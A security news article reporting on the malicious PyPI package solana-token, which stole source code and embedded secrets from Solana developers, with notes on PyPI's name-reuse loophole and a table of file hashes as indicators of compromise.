A new supply chain attack has been uncovered in the Python ecosystem, as security researchers from RL identified a malicious package named solana-token on the popular PyPI repository.
The package, which masqueraded as a legitimate utility for developers working with the Solana blockchain, was downloaded over 600 times before its removal.
Solana, known for its high-performance decentralized infrastructure and the SOL cryptocurrency, continues to attract both legitimate developer interest and, as this incident demonstrates, malicious actors seeking to exploit the growing ecosystem.
Targeting Sensitive Developer Assets
The malicious solana-token package drew scrutiny due to a set of behaviors frequently linked to infostealer malware.
Among its most notable traits were hardcoded URLs referencing host machines by IP address-an obfuscation tactic to avoid detection by automated security scanners-as well as code initiating outbound connections to non-standard network ports, and the ability to scan and read from files within the execution chain.
These signifiers prompted RL’s investigation, ultimately revealing code designed to exfiltrate source files and, critically, any embedded secrets or credentials such as hardcoded crypto wallet keys.
Unlike prior attacks that primarily targeted end-user assets such as those seen in the Atomic and Exodus wallet breaches, this campaign was aimed specifically at developers.
By compromising their environments and stealing sensitive application code, attackers gain privileged access to potentially vulnerable infrastructure, making this a significant escalation in the ongoing threat against crypto-related projects.
Notably, the package implemented routines to harvest and send source code files to remote servers, a technique rarely observed in open-source malware targeting the Python ecosystem.
Persistent Name Reuse
The solana-token name was not new to PyPI; previous versions had been detected and removed from the repository.
However, the earlier takedown was actioned by the package authors, not PyPI’s security team, leaving the name available for reuse.
The reappearance of solana-token, albeit with a different versioning scheme and altered code, highlights a loophole in PyPI’s package removal policy and raises concerns about the platform’s resilience against persistent attackers.
While no definitive link has been established between previous and current operators, the pattern suggests a deliberate strategy to exploit trusted names and target developer communities repeatedly.
RL’s swift report of the latest iteration led to the permanent removal of solana-token from PyPI, which should, in theory, prevent future uploads using that name.
However, the episode underscores the ongoing threat landscape faced by software supply chains, especially in the fast-evolving cryptocurrency space where hardcoded credentials and sensitive assets frequently reside within source code.
This incident serves as a critical warning for software development teams: vigilance is essential, not only in monitoring code dependencies but in auditing package provenance and activity within development environments.
Supply chain attacks, as evidenced by solana-token, are growing increasingly sophisticated, with adversaries now targeting the tools and modules used by crypto developers as a means to gain access to broader infrastructure.
The solana-token supply chain attack is a sobering reminder of the rising risks in open-source software ecosystems and the elevated stakes for blockchain and crypto project developers worldwide.
Indicators of Compromise (IOCs)
| package_name | version | SHA1 |
|---|---|---|
| solana-token | 0.0.1 | f4e1149360174b4fcf0dcc6e61898c8180324893 |
| solana-token | 0.0.1 | 0b8697f8e81956e7c0c5383806fa69630c38ad33 |
| solana-token | 0.0.2 | e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84 |
| solana-token | 0.0.2 | 9719d1e076ab67a18f231889cad4b451f539ce72 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
